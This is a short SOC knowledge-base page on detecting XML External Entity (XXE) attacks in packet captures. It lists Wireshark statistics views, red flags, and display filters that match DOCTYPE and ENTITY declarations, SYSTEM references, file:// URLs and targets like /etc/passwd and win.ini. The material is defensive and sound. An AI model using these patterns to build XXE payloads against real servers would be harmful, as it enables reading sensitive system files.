Operator On The Wire
← Back to Knowledge Base
BLUE TEAM / SOC / FILTERING / ATTACKS / APPLICATION LAYER / HTTP / ATTACKS

XXE

Attacker injects malicious XML entities to read local files, perform SSRF, or interact with internal systems


Hunting

Statistics → Conversations → IPv4
Statistics → Endpoints → IPv4
Statistics → Protocol Hierarchy
Statistics → IO Graph


Red Flags

  • <!DOCTYPE inside request body
  • <!ENTITY declarations
  • SYSTEM or PUBLIC external references
  • Requests containing XML with unexpected external URLs
  • File path references (file:///etc/passwd, C:\Windows\win.ini)

Filters

# XML DOCTYPE declaration
http contains "<!DOCTYPE"

# External ENTITY declaration
http contains "<!ENTITY"

# SYSTEM keyword (external entity reference)
http contains "SYSTEM"

# File protocol usage
http contains "file://"

# Common sensitive file targets
http contains "/etc/passwd" or http contains "win.ini"